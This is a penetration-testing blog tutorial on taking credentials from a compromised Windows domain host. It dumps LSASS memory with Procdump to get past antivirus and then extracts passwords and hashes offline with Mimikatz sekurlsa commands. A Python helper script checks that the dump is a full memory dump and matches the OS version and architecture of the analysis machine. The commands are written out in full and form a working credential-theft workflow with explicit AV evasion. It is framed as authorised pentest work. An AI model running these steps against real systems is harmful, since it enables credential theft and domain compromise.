Tutorial: Extracting Passwords

February 22, 2017


I want to share one way of extracting passwords from a Windows machine even when an antivirus agent is installed on it.

On an internal engagement a pentester aims to compromise the domain and become domain admin. Often I have observed that compromising a single domain-joined host is easy: a vulnerability scanner such as Nessus, or Nmap's NSE scripts, points you at an exploitable weakness in the host, and you exploit it. Once a host in the domain is compromised we should extract all the information we can from it, and one of the most valuable things to extract is the set of credentials it holds in memory. When we talk about dumping passwords, the first thing that comes to a pentester's mind is Mimikatz, the excellent tool developed by Benjamin Delpy.

Unfortunately, Mimikatz is detected by practically every antivirus product and is deleted the moment it is transferred to the compromised machine. What comes to our rescue is another tool, Procdump. Procdump is a signed Microsoft Sysinternals utility, so a signature-based antivirus will not flag the binary itself (an EDR product that watches for processes opening lsass.exe with read access is a different matter, so do not count on this being silent). Procdump is a command-line utility that monitors applications for CPU spikes and can also serve as a general process dump utility that you can embed in other scripts. You can download it from the Sysinternals section of technet.microsoft.com and transfer it to the compromised host with ease.

Using Procdump you can easily dump the lsass process (the Local Security Authority Subsystem, which holds the credential material of every logged-on user). Run it from an elevated prompt, since opening lsass.exe requires administrative rights; the -ma switch writes a full memory dump, which Mimikatz needs, and the first run on a host will show the Sysinternals license prompt unless you add -accepteula. The command is:

C:\Users\parichay\Downloads\Procdump>procdump.exe -ma -64 lsass.exe pass.dmp

(-64 forces a 64-bit dump; on 64-bit Windows lsass.exe is already a native 64-bit process, so the switch is harmless there but not required.)

This dump can then be used to extract the credentials with our beloved Mimikatz, on a machine of your own rather than on the compromised host. Note that clear-text passwords come from the WDigest provider, which is disabled by default from Windows 8.1 and Server 2012 R2 onwards (and can be disabled on older versions via KB2871997); on such hosts you will still get NTLM hashes and Kerberos material from the dump. The commands to load the dump and extract the credentials from it are:

mimikatz # sekurlsa::minidump pass.dmp

mimikatz # sekurlsa::logonPasswords full

One thing that you should know before using Mimikatz on the extracted dump is Windows version compatibility. The sekurlsa module parses undocumented LSASS structures whose layout changes between Windows versions and builds, so the machine on which you run Mimikatz against the dump should run the same Windows version as the machine the dump was taken from, and the same architecture (a 64-bit dump needs the 64-bit Mimikatz build). Please refer to this Wikipedia source for the list of Windows NT versions: https://en.wikipedia.org/wiki/Windows_NT
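Before carrying a dump over to the analysis box it is worth checking two things cheaply: that it really is a full memory dump (otherwise the -ma switch was missed and sekurlsa will find nothing), and which Windows version and architecture produced it, so you can pick a matching machine to run Mimikatz on. The following script is an added example, not part of the original tutorial and not Procdump or Mimikatz code; it parses only the MINIDUMP_HEADER, the stream directory and the SystemInfoStream as laid out in the public minidumpapiset.h structures. The sample dump it builds is constructed inline (it contains no process memory) so the script runs offline; pass a real pass.dmp on the command line to check that instead.

```python
"""Sanity-check an LSASS minidump before feeding it to Mimikatz (added example)."""
import struct
import sys

MDMP_SIGNATURE = 0x504D444D          # little-endian bytes b"MDMP"
MINIDUMP_VERSION = 0xA793            # low 16 bits of MINIDUMP_HEADER.Version
SYSTEM_INFO_STREAM = 7               # MINIDUMP_STREAM_TYPE.SystemInfoStream
MINIDUMP_WITH_FULL_MEMORY = 0x2      # MINIDUMP_TYPE flag written by procdump -ma

# Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
HEADER_FMT = "<IIIIIIQ"
# StreamType, Location.DataSize, Location.Rva
DIRECTORY_FMT = "<III"
# First 32 bytes of MINIDUMP_SYSTEM_INFO; the trailing 24-byte CPU_INFORMATION is skipped
SYSINFO_FMT = "<HHHBBIIIIIHH"

ARCH_NAMES = {0: "x86", 5: "ARM", 9: "x64", 12: "ARM64"}
PRODUCT_NAMES = {1: "Workstation", 2: "Domain Controller", 3: "Server"}


def parse_minidump(blob):
    """Return header flags and SystemInfo fields from a minidump byte string."""
    if len(blob) < struct.calcsize(HEADER_FMT):
        raise ValueError("file too short to be a minidump")
    sig, version, nstreams, dir_rva, _csum, _stamp, flags = struct.unpack_from(HEADER_FMT, blob, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("bad signature: not a minidump")
    if (version & 0xFFFF) != MINIDUMP_VERSION:
        raise ValueError(f"unexpected minidump version 0x{version & 0xFFFF:04x}")
    info = {"full_memory": bool(flags & MINIDUMP_WITH_FULL_MEMORY), "streams": nstreams}
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from(DIRECTORY_FMT, blob, dir_rva + i * struct.calcsize(DIRECTORY_FMT))
        if stype != SYSTEM_INFO_STREAM:
            continue
        if size < struct.calcsize(SYSINFO_FMT) or rva + size > len(blob):
            raise ValueError("SystemInfoStream is truncated")
        (arch, _lvl, _rev, ncpu, ptype, major, minor, build,
         _platform, _csd_rva, _suite, _r2) = struct.unpack_from(SYSINFO_FMT, blob, rva)
        info.update(arch=ARCH_NAMES.get(arch, f"unknown({arch})"),
                    product=PRODUCT_NAMES.get(ptype, f"unknown({ptype})"),
                    version=(major, minor, build), cpus=ncpu)
    if "version" not in info:
        raise ValueError("no SystemInfoStream: cannot tell which OS produced the dump")
    return info


def check_dump(blob, host_arch, host_version):
    """Compare a dump with the analysis host; return (ok, list of problems)."""
    info = parse_minidump(blob)
    problems = []
    if not info["full_memory"]:
        problems.append("not a full memory dump: re-run procdump with -ma")
    if info["arch"] != host_arch:
        problems.append(f"dump is {info['arch']} but analysis host is {host_arch}: use the matching Mimikatz build")
    major, minor, build = info["version"]
    if (major, minor) != tuple(host_version[:2]):
        problems.append(f"dump is from Windows {major}.{minor} build {build}, host is "
                        f"{host_version[0]}.{host_version[1]}: parse it on the same OS version")
    return (not problems), problems


def build_sample_minidump(arch=9, version=(10, 0, 14393), product_type=1, flags=0x6):
    """Construct a minimal synthetic minidump (header + one directory entry + SystemInfo).

    Test scaffolding for this example only: no real LSASS memory is included.
    """
    dir_rva = struct.calcsize(HEADER_FMT)                 # directory follows the 32-byte header
    sysinfo_size = struct.calcsize(SYSINFO_FMT) + 24      # 56 bytes including CPU_INFORMATION
    sysinfo_rva = dir_rva + struct.calcsize(DIRECTORY_FMT)
    csd_rva = sysinfo_rva + sysinfo_size                  # empty MINIDUMP_STRING for CSDVersion
    major, minor, build = version
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, MINIDUMP_VERSION, 1, dir_rva, 0, 0, flags)
    directory = struct.pack(DIRECTORY_FMT, SYSTEM_INFO_STREAM, sysinfo_size, sysinfo_rva)
    sysinfo = struct.pack(SYSINFO_FMT, arch, 6, 0x3F01, 4, product_type,
                          major, minor, build, 2, csd_rva, 0x100, 0) + b"\x00" * 24
    csd = struct.pack("<I", 0) + b"\x00\x00"              # Length = 0 plus terminating NUL
    return header + directory + sysinfo + csd


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:      # e.g. python check_dump.py pass.dmp
            data = f.read()
    else:
        data = build_sample_minidump()          # constructed sample: x64, Windows 10 build 14393
    ok, problems = check_dump(data, host_arch="x64", host_version=(10, 0))
    print(parse_minidump(data))
    print("OK: dump looks usable on this host" if ok else "\n".join(problems))
```

The host architecture and version are passed in explicitly rather than read from the running OS so the check also works when you inspect the dump on a Linux jump box before choosing a Windows VM to run Mimikatz on.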

  1. How to use this tool, sir?